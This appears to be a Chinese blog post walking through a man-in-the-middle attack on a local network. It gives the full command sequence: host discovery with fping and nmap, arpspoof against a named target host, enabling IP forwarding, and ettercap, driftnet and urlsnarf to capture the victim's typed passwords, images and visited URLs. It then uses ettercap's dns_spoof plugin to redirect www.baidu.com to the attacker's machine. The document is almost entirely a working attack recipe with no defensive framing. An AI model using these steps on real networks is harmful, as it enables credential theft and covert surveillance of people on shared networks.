首页 杂项

arp欺骗

  • 攻击系统:Manjaro Linux
  • 攻击机: 192.168.0.226
  • 目标主机:192.168.0.75
  • 网关:192.168.0.1
  • 无线网卡名称: wlp3s0

首先连接wifi,进入内网
1,查看内网的存活主机命令

fping -a -g 192.168.0.1/24
或者
nmap -sP 192.168.0.1/24 

2020-10-07_14-32.png
2,arp欺骗
形如

arpspoof -i <网卡接口>-t <目标的内网地址> <网关ip>

命令:

sudo arpspoof -i wlp3s0 -t 192.168.0.75 192.168.0.1

上面一句就对192.168.0.75实施了欺骗 ,此时该主机是断网的

3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络

su - #改变用户为root,并使用root环境变量
echo 1 >/proc/sys/net/ipv4/ip_forward   #将参数换为1

默认为0,0为不转发,1为启用流量转发
这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包

sudo ettercap -Tq -i wlp3s0

这样被人输入密码后,我们就可以直接看到。
获取图片和浏览的网站

sudo driftnet -i wlp3s0
sudo urlsnarf -i wlp3s0

dns劫持

修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名

2020-10-07_14-37.png

开始进行DNS欺骗攻击:

sudo ettercap -i wlp3s0 -Tq -M arp:remote -P dns_spoof /192.168.0.75// /192.168.0.1//

EBE5A97F51A0C7A846A7BFF137ED8B59.jpg

进行DNS 欺骗后,再次测试:ping www.baidu.com ,发现将www.baidu.com 解析指向了攻击者主机(192.168.0.226)




文章评论

目录